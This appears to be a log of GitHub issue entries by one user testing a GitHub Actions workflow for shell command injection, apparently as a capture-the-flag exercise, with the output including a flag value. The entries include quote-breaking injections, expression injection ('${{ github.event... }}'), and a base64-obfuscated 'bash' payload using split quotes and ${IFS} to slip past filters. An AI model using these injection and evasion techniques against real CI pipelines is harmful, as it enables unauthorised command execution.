Nkzlxs:hello

FLAG
Nkzlxs:asasssas
FLAG
1. Nkzlxs:happy
2. happy
1. Nkzlxs:$flag
2. hello_flag_i_am_the_flag
1. Nkzlxs:a"; ls $GITHUB_WORKSPACE"
README.md
issues
1. Nkzlxs:a"; ls $GITHUB_WORKSPACE"
1. Nkzlxs:a"; ls $GITHUB_WORKSPACE >> issues"
1. Nkzlxs:a"; echo "try again" >> issues"
1. Nkzlxs:${{ github.event.issue.user.login }}
1. Nkzlxs:"${{ github.event.issue.user.login }}"
1. Nkzlxs:\"
1. Nkzlxs:hi
hi
hih
hih
i
hi
hi

1. Nkzlxs:hi
    issues: abc
Nkzlxs:echo $(echo 'bash -c ls' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g
Nkzlxs:";echo $(echo 'bash -c ls' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g"

Nkzlxs:";echo $(echo 'bash -c ls' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g"
